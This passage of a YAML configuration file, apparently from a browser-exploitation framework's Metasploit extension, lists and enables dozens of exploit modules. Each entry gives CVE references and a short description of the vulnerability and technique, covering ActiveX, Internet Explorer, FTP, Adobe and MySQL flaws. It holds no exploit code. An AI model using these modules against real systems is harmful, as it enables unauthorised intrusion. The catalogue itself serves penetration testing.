\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n\
\t\t\t\tBy sending an overly long string to the \"_DOWText0\" property located\n\
\t\t\t\tin the pvcalendar.ocx control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6016
- - OSVDB
- "42358"
- - BID
- "26904"
- - URL
- http://secunia.com/advisories/27885/
path: extensions/metasploit/
class: Msf_module
msf_ms10_002_aurora:
enable: true
msf: true
msf_key: windows/browser/ms10_002_aurora
name: Internet Explorer "Aurora" Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption flaw in Internet Explorer. This\n\
\t\t\t\tflaw was found in the wild and was a key component of the \"Operation Aurora\"\n\
\t\t\t\tattacks that lead to the compromise of a number of high profile companies. The\n\
\t\t\t\texploit code is a direct port of the public sample published to the Wepawet\n\
\t\t\t\tmalware analysis site. The technique used by this module is currently identical\n\
\t\t\t\tto the public sample, as such, only Internet Explorer 6 can be reliably exploited.\n\
\t\t\t"
authors:
- - MSB
- MS10-002
- - CVE
- 2010-0249
- - OSVDB
- "61697"
- - URL
- http://www.microsoft.com/technet/security/advisory/979352.mspx
- - URL
- http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
path: extensions/metasploit/
class: Msf_module
msf_blackice_downloadimagefileurl:
enable: true
msf: true
msf_key: windows/browser/blackice_downloadimagefileurl
name: Black Ice Cover Page ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\
\t\t\t\tby abusing the \"DownloadImageFileURL\" method in the Black Ice BIImgFrm.ocx ActiveX\n\
\t\t\t\tControl (BIImgFrm.ocx 12.0.0.0). Code exeuction can be acheived by first uploading the\n\
\t\t\t\tpayload to the remote machine, and then upload another mof file, which enables Windows\n\
\t\t\t\tManagement Instrumentation service to execute the binary. Please note that this module\n\
\t\t\t\tcurrently only works for Windows before Vista. Also, a similar issue is reported in\n\
\t\t\t\tBIDIB.ocx (10.9.3.0) within the Barcode SDK.\n\
\t\t\t"
authors:
- - CVE
- 2008-2683
- - OSVDB
- "46007"
- - BID
- "29577"
- - URL
- http://www.exploit-db.com/exploits/5750/
path: extensions/metasploit/
class: Msf_module
msf_hpmqc_progcolor:
enable: true
msf: true
msf_key: windows/browser/hpmqc_progcolor
name: HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack-based buffer overflow in SPIDERLib.Loader\n\
\t\t\t\tActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)\n\
\t\t\t\tfor Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and\n\
\t\t\t\t8.2 SP1 before Patch 32.\n\
\t\t\t\tBy setting an overly long value to 'ProgColor', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1819
- - OSVDB
- "34317"
- - BID
- "23239"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497
path: extensions/metasploit/
class: Msf_module
msf_ie_createobject:
enable: true
msf: true
msf_key: windows/browser/ie_createobject
name: Internet Explorer COM CreateObject Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\n\
\t\t\t\tExplorer by abusing vulnerable ActiveX objects.\n\
\t\t\t"
authors:
- - MSB
- MS06-014
- - CVE
- 2006-0003
- - OSVDB
- "24517"
- - MSB
- MS06-073
- - CVE
- 2006-4704
- - OSVDB
- "30155"
path: extensions/metasploit/
class: Msf_module
msf_mswhale_checkforupdates:
enable: true
msf: true
msf_key: windows/browser/mswhale_checkforupdates
name: Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n\
\t\t\t\tGateway Whale Client. When sending an overly long string to CheckForUpdates()\n\
\t\t\t\tmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2238
- - OSVDB
- "53933"
- - URL
- http://technet.microsoft.com/en-us/library/dd282918.aspx
path: extensions/metasploit/
class: Msf_module
msf_ms06_055_vml_method:
enable: true
msf: true
msf_key: windows/browser/ms06_055_vml_method
name: Internet Explorer VML Fill Method Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer using\n\
\t\t\t\ta buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n\
\t\t\t\tWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n\
\t\t\t"
authors:
- - CVE
- 2006-4868
- - OSVDB
- "28946"
- - MSB
- MS06-055
- - BID
- "20096"
path: extensions/metasploit/
class: Msf_module
msf_mozilla_interleaved_write:
enable: true
msf: true
msf_key: windows/browser/mozilla_interleaved_write
name: Mozilla Firefox Interleaving document.write and appendChild Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Mozilla\n\
\t\t\t\tFirefox caused by interleaved calls to document.write and appendChild.\n\
\t\t\t\tThis exploit is a metasploit port of the in-the-wild exploit.\n\
\t\t\t"
authors:
- - CVE
- 2010-3765
- - OSVDB
- "68905"
- - BID
- "15352"
- - URL
- http://www.exploit-db.com/exploits/15352/
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=607222
- - URL
- http://www.mozilla.org/security/announce/2010/mfsa2010-73.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_callbackurl:
enable: true
msf: true
msf_key: windows/browser/novelliprint_callbackurl
name: Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n\
\t\t\t\tWhen sending an overly long string to the 'call-back-url' parameter in an\n\
\t\t\t\top-client-interface-version action of ienipp.ocx an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1527
- - OSVDB
- "67411"
- - URL
- http://secunia.com/secunia_research/2010-104/
- - URL
- http://www.exploit-db.com/exploits/15042/
path: extensions/metasploit/
class: Msf_module
msf_vlc_amv:
enable: true
msf: true
msf_key: windows/browser/vlc_amv
name: VLC AMV Dangling Pointer Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits VLC media player when handling a .AMV file. By flipping the 0x41st\n\
\t\t\t\tbyte in the file format (video width/height), VLC crashes due to an invalid pointer, which\n\
\t\t\t\tallows remote attackers to gain arbitrary code execution.\n\
\t\t\t\t\n\
\t\t\t\tThe vulnerable packages include:\n\
\t\t\t\tVLC 1.1.4\n\
\t\t\t\tVLC 1.1.5\n\
\t\t\t\tVLC 1.1.6\n\
\t\t\t\tVLC 1.1.7\n\
\t\t\t\t"
authors:
- - CVE
- 2010-3275
- - OSVDB
- "71277"
- - URL
- http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
- - URL
- http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11
path: extensions/metasploit/
class: Msf_module
msf_persits_xupload_traversal:
enable: true
msf: true
msf_key: windows/browser/persits_xupload_traversal
name: Persits XUpload ActiveX MakeHttpRequest Directory Traversal
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a directory traversal in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n\
\t\t\t\tBy passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n\
\t\t\t\tan attacker is able to write arbitrary files to arbitrary locations on disk.\n\n\
\t\t\t\tCode execution occurs by writing to the All Users Startup Programs directory.\n\
\t\t\t\tYou may want to combine this module with the use of multi/handler since a\n\
\t\t\t\tuser would have to log for the payloda to execute.\n\
\t\t\t"
authors:
- - CVE
- 2009-3693
- - OSVDB
- "60001"
- - URL
- http://retrogod.altervista.org/9sg_hp_loadrunner.html
path: extensions/metasploit/
class: Msf_module
msf_ms10_090_ie_css_clip:
enable: true
msf: true
msf_key: windows/browser/ms10_090_ie_css_clip
name: Internet Explorer CSS SetUserClip Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThie module exploits a memory corruption vulnerability within Microsoft's\n\
\t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a specially\n\
\t\t\t\tcrafted CSS tag, memory corruption occurs that can lead arbitrary code\n\
\t\t\t\texecution.\n\n\
\t\t\t\tIt seems like Microsoft code inadvertantly increments a vtable pointer to\n\
\t\t\t\tpoint to an unaligned address within the vtable's function pointers. This\n\
\t\t\t\tleads to the program counter being set to the address determined by the\n\
\t\t\t\taddress \"[vtable+0x30+1]\". The particular address depends on the exact\n\
\t\t\t\tversion of the mshtml library in use.\n\n\
\t\t\t\tSince the address depends on the version of mshtml, some versions may not\n\
\t\t\t\tbe exploitable. Specifically, those ending up with a program counter value\n\
\t\t\t\twithin another module, in kernel space, or just not able to be reached with\n\
\t\t\t\tvarious memory spraying techniques.\n\n\
\t\t\t\tAlso, since the address is not controllable, it is unlikely to be possible\n\
\t\t\t\tto use ROP to bypass non-executable memory protections.\n\
\t\t\t"
authors:
- - CVE
- 2010-3962
- - OSVDB
- "68987"
- - BID
- "44536"
- - URL
- http://www.microsoft.com/technet/security/advisory/2458511.mspx
- - URL
- http://www.exploit-db.com/exploits/15421/
- - MSB
- MS10-090
path: extensions/metasploit/
class: Msf_module
msf_ebook_flipviewer_fviewerloading:
enable: true
msf: true
msf_key: windows/browser/ebook_flipviewer_fviewerloading
name: FlipViewer FViewerLoading ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error in the\n\
\t\t\t\tFViewerLoading (FlipViewerX.dll) ActiveX control when handling the\n\
\t\t\t\t\"LoadOpf()\" method.\n\
\t\t\t"
authors:
- - CVE
- 2007-2919
- - OSVDB
- "37042"
- - BID
- "24328"
path: extensions/metasploit/
class: Msf_module
msf_ms09_002_memory_corruption:
enable: true
msf: true
msf_key: windows/browser/ms09_002_memory_corruption
name: Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an error related to the CFunctionPointer function when attempting\n\
\t\t\t\tto access uninitialized memory. A remote attacker could exploit this vulnerability to\n\
\t\t\t\tcorrupt memory and execute arbitrary code on the system with the privileges of the victim.\n\
\t\t\t"
authors:
- - CVE
- 2009-0075
- - OSVDB
- "51839"
- - MSB
- MS09-002
path: extensions/metasploit/
class: Msf_module
msf_adobe_geticon:
enable: true
msf: true
msf_key: windows/fileformat/adobe_geticon
name: Adobe Collab.getIcon() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n\
\t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0927
- - OSVDB
- "53647"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-014/
path: extensions/metasploit/
class: Msf_module
msf_systemrequirementslab_unsafe:
enable: true
msf: true
msf_key: windows/browser/systemrequirementslab_unsafe
name: Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows attackers to execute code via an unsafe method in\n\
\t\t\t\tHusdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)\n\
\t\t\t"
authors:
- - CVE
- 2008-4385
- - OSVDB
- "50122"
- - US-CERT-VU
- "166651"
path: extensions/metasploit/
class: Msf_module
msf_msvidctl_mpeg2:
enable: true
msf: true
msf_key: windows/browser/msvidctl_mpeg2
name: Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption within the MSVidCtl component of Microsoft\n\
\t\t\t\tDirectShow (BDATuner.MPEG2TuneRequest).\n\
\t\t\t\tBy loading a specially crafted GIF file, an attacker can overrun a buffer and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tClassID is now configurable via an advanced option (otherwise randomized) - I)ruid\n\
\t\t\t"
authors:
- - CVE
- 2008-0015
- - OSVDB
- "55651"
- - BID
- "35558"
- - MSB
- MS09-032
- - MSB
- MS09-037
- - URL
- http://www.microsoft.com/technet/security/advisory/972890.mspx
path: extensions/metasploit/
class: Msf_module
msf_symantec_altirisdeployment_runcmd:
enable: true
msf: true
msf_key: windows/browser/symantec_altirisdeployment_runcmd
name: Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n\
\t\t\t\tWhen sending an overly long string to RunCmd() method of\n\
\t\t\t\tAeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2009-3033
- - BID
- "37092"
- - OSVDB
- "60496"
path: extensions/metasploit/
class: Msf_module
msf_adobe_shockwave_rcsl_corruption:
enable: true
msf: true
msf_key: windows/browser/adobe_shockwave_rcsl_corruption
name: Adobe Shockwave rcsL Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a weakness in the Adobe Shockwave player's handling of\n\
\t\t\t\tDirector movies (.DIR). A memory corruption vulnerability occurs through an undocumented\n\
\t\t\t\trcsL chunk. This vulnerability was discovered by http://www.abysssec.com.\n\
\t\t\t"
authors:
- - CVE
- 2010-3653
- - OSVDB
- "68803"
- - URL
- http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
path: extensions/metasploit/
class: Msf_module
msf_logitechvideocall_start:
enable: true
msf: true
msf_key: windows/browser/logitechvideocall_start
name: Logitech VideoCall ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n\
\t\t\t\tControl (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the\n\
\t\t\t\t\"Start()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2918
- - OSVDB
- "36820"
- - BID
- "24254"
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_getdriversettings:
enable: true
msf: true
msf_key: windows/browser/novelliprint_getdriversettings
name: Novell iPrint Client ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n\
\t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2908
- - OSVDB
- "46194"
- - URL
- http://secunia.com/advisories/30709/
path: extensions/metasploit/
class: Msf_module
msf_mysql_payload:
enable: true
msf: true
msf_key: windows/mysql/mysql_payload
name: Oracle MySQL for Microsoft Windows Payload Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\
\t\t\t\ttarget host via the SELECT ... into DUMPFILE method of binary injection. On\n\
\t\t\t\tdefault Microsoft Windows installations of MySQL (=< 5.5.9), directory write\n\
\t\t\t\tpermissions not enforced, and the MySQL service runs as LocalSystem.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished, as well as the UDF DLL, and will define or redefine sys_eval()\n\
\t\t\t\tand sys_exec() functions.\n\
\t\t\t"
authors:
- - URL
- http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
- - URL
- http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html
path: extensions/metasploit/
class: Msf_module
msf_calicserv_getconfig:
enable: true
msf: true
msf_key: windows/license/calicserv_getconfig
name: Computer Associates License Server GETCONFIG Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an vulnerability in the CA License Server\n\
\t\t\t\tnetwork service. By sending an excessively long GETCONFIG\n\
\t\t\t\tpacket the stack may be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213
path: extensions/metasploit/
class: Msf_module
msf_sentinel_lm7_udp:
enable: true
msf: true
msf_key: windows/license/sentinel_lm7_udp
name: SentinelLM UDP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in the Sentinel\n\
\t\t\t\tLicense Manager. The SentinelLM service is installed with a\n\
\t\t\t\twide selection of products and seems particular popular with\n\
\t\t\t\tacademic products. If the wrong target value is selected,\n\
\t\t\t\tthe service will crash and not restart.\n\
\t\t\t"
authors:
- - CVE
- 2005-0353
- - OSVDB
- "14605"
- - BID
- "12742"
path: extensions/metasploit/
class: Msf_module
msf_calicclnt_getconfig:
enable: true
msf: true
msf_key: windows/license/calicclnt_getconfig
name: Computer Associates License Client GETCONFIG Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an vulnerability in the CA License Client\n\
\t\t\t\tservice. This exploit will only work if your IP address can be\n\
\t\t\t\tresolved from the target system point of view. This can be\n\
\t\t\t\taccomplished on a local network by running the 'nmbd' service\n\
\t\t\t\tthat comes with Samba. If you are running this exploit from\n\
\t\t\t\tWindows and do not filter udp port 137, this should not be a\n\
\t\t\t\tproblem (if the target is on the same network segment). Due to\n\
\t\t\t\tthe bugginess of the software, you are only allowed one connection\n\
\t\t\t\tto the agent port before it starts ignoring you. If it wasn't for this\n\
\t\t\t\tissue, it would be possible to repeatedly exploit this bug.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213
path: extensions/metasploit/
class: Msf_module
msf_globalscapeftp_input:
enable: true
msf: true
msf_key: windows/ftp/globalscapeftp_input
name: GlobalSCAPE Secure FTP Server Input Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n\
\t\t\t\tAll versions prior to 3.0.3 are affected by this flaw. A valid user account (\n\
\t\t\t\tor anonymous access) is required for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2005-1415
- - OSVDB
- "16049"
- - BID
- "13454"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html
path: extensions/metasploit/
class: Msf_module
msf_32bitftp_list_reply:
enable: true
msf: true
msf_key: windows/ftp/32bitftp_list_reply
name: "32bit FTP Client Stack Buffer Overflow "
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n\
\t\t\t\t\tdownload a file that has an overly long filename.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_wftpd_size:
enable: true
msf: true
msf_key: windows/ftp/wftpd_size
name: Texas Imperial Software WFTPD 3.23 SIZE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the SIZE verb in\n\
\t\t\t\tTexas Imperial's Software WFTPD 3.23.\n\
\t\t\t"
authors:
- - CVE
- 2006-4318
- - OSVDB
- "28134"
- - BID
- "19617"
path: extensions/metasploit/
class: Msf_module
msf_odin_list_reply:
enable: true
msf: true
msf_key: windows/ftp/odin_list_reply
name: Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n\
\t\t\t\ttriggered when processing the response on a LIST command. During the overflow,\n\
\t\t\t\ta structured exception handler record gets overwritten.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_dreamftp_format:
enable: true
msf: true
msf_key: windows/ftp/dreamftp_format
name: BolinTech Dream FTP Server 1.02 Format String
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string overflow in the BolinTech\n\
\t\t\t\tDream FTP Server version 1.02. Based on the exploit by SkyLined.\n\
\t\t\t"
authors:
- - CVE
- 2004-2074
- - OSVDB
- "4986"
- - BID
- "9800"
- - URL
- http://www.milw0rm.com/exploits/823
path: extensions/metasploit/
class: Msf_module
msf_proftp_banner:
enable: true
msf: true
msf_key: windows/ftp/proftp_banner
name: ProFTP 2.9 Banner Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the ProFTP 2.9\n\
\t\t\t\tclient that is triggered through an excessively long welcome message.\n\
\t\t\t"
authors:
- - CVE
- 2009-3976
- - OSVDB
- "57394"
- - URL
- http://www.labtam-inc.com/index.php?act=products&pid=1
path: extensions/metasploit/
class: Msf_module
msf_filewrangler_list_reply:
enable: true
msf: true
msf_key: windows/ftp/filewrangler_list_reply
name: FileWrangler 5.30 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the FileWrangler client\n\
\t\t\t\tthat is triggered when the client connects to a FTP server and lists\n\
\t\t\t\tthe directory contents, containing an overly long directory name.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_httpdx_tolog_format:
enable: true
msf: true
msf_key: windows/http/httpdx_tolog_format
name: HTTPDX tolog() Function Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in HTTPDX HTTP server.\n\
\t\t\t\tBy sending an specially crafted HTTP request containing format specifiers, an\n\
\t\t\t\tattacker can corrupt memory and execute arbitrary code.\n\n\
\t\t\t\tBy default logging is off for HTTP, but enabled for the 'moderator' user\n\
\t\t\t\tvia FTP.\n\
\t\t\t"
authors:
- - CVE
- 2009-4769
- - OSVDB
- "60182"
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_ftp_pass:
enable: true
msf: true
msf_key: windows/ftp/oracle9i_xdb_ftp_pass
name: Oracle 9i XDB FTP PASS Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tBy passing an overly long string to the PASS command, a\n\
\t\t\t\tstack based buffer overflow occurs. David Litchfield, has\n\
\t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\
\t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\
\t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\
\t\t\t\tconference.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_slimftpd_list_concat:
enable: true
msf: true
msf_key: windows/ftp/slimftpd_list_concat
name: SlimFTPd LIST Concatenation Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the SlimFTPd\n\
\t\t\t\tserver. The flaw is triggered when a LIST command is\n\
\t\t\t\treceived with an overly-long argument. This vulnerability\n\
\t\t\t\taffects all versions of SlimFTPd prior to 3.16 and was\n\
\t\t\t\tdiscovered by Raphael Rigo.\n\
\t\t\t"
authors:
- - CVE
- 2005-2373
- - OSVDB
- "18172"
- - BID
- "14339"
path: extensions/metasploit/
class: Msf_module
msf_easyfilesharing_pass:
enable: true
msf: true
msf_key: windows/ftp/easyfilesharing_pass
name: Easy File Sharing FTP Server 2.0 PASS Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Easy File Sharing 2.0\n\
\t\t\t\tservice. By sending an overly long password, an attacker can execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-3952
- - OSVDB
- "27646"
- - BID
- "19243"
path: extensions/metasploit/
class: Msf_module
msf_xftp_client_pwd:
enable: true
msf: true
msf_key: windows/ftp/xftp_client_pwd
name: Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n\
\t\t\t\tthrough an excessively long PWD message.\n\
\t\t\t"
authors:
- - OSVDB
- "63968"
- - URL
- http://www.exploit-db.com/exploits/12332
path: extensions/metasploit/
class: Msf_module
msf_xlink_client:
enable: true
msf: true
msf_key: windows/ftp/xlink_client
name: Xlink FTP Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Client 32\n\
\t\t\t\tVersion 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n\
\t\t\t\tWhen a overly long FTP server response is recieved by a client,\n\
\t\t\t\tarbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2006-5792
- - OSVDB
- "33969"
- - URL
- http://www.metasploit.com/
- - URL
- http://www.xlink.com
path: extensions/metasploit/
class: Msf_module
msf_3cdaemon_ftp_user:
enable: true
msf: true
msf_key: windows/ftp/3cdaemon_ftp_user
name: 3Com 3CDaemon 2.0 FTP Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the 3Com 3CDaemon\n\
\t\t\t\tFTP service. This package is being distributed from the 3Com\n\
\t\t\t\tweb site and is recommended in numerous support documents.\n\
\t\t\t\tThis module uses the USER command to trigger the overflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-0277
- - OSVDB
- "12810"
- - OSVDB
- "12811"
- - BID
- "12155"
- - URL
- ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
path: extensions/metasploit/
class: Msf_module
msf_easyftp_list_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_list_fixret
name: EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n\
\t\t\t\tcredit goes to Karn Ganeshan.\n\n\
\t\t\t\tNOTE: Although, this is likely to exploit the same vulnerability as the\n\
\t\t\t\t'easyftp_cwd_fixret' exploit, it uses a slightly different vector.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://www.exploit-db.com/exploits/14400/
- - URL
- http://www.exploit-db.com/exploits/14451/
path: extensions/metasploit/
class: Msf_module
msf_filecopa_list_overflow:
enable: true
msf: true
msf_key: windows/ftp/filecopa_list_overflow
name: FileCopa FTP Server pre 18 Jul Version
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the buffer overflow found in the LIST command\n\
\t\t\t\tin fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch\n\
\t\t\t"
authors:
- - CVE
- 2006-3726
- - OSVDB
- "27389"
- - BID
- "19065"
path: extensions/metasploit/
class: Msf_module
msf_ftpsynch_list_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpsynch_list_reply
name: FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n\
\t\t\t\tversion 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n\
\t\t\t\tthe client in response to a LIST command.\n\
\t\t\t\tThe LIST command gets issued when doing a preview or when you have just created a new\n\
\t\t\t\tsync profile and allow the tool to see the differences.\n\
\t\t\t\tThis will overwrite a structured exception handler and trigger an access violation.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_ftpshell51_pwd_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpshell51_pwd_reply
name: FTPShell 5.1 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n\
\t\t\t\ttriggered when the ftp clients tries to process an overly response to a PWD command.\n\
\t\t\t\tThis will overwrite the saved EIP and structured exception handler.\n\
\t\t\t"
authors:
- - OSVDB
- "68639"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_easyftp_mkd_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_mkd_fixret
name: EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n\
\t\t\t\tleads to a stack based buffer overflow.\n\n\
\t\t\t\tNOTE: EasyFTP allows anonymous access by default. However, in order to access the\n\
\t\t\t\t'MKD' command, you must have access to an account that can create directories.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tThis exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n\
\t\t\t\tThis code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n\
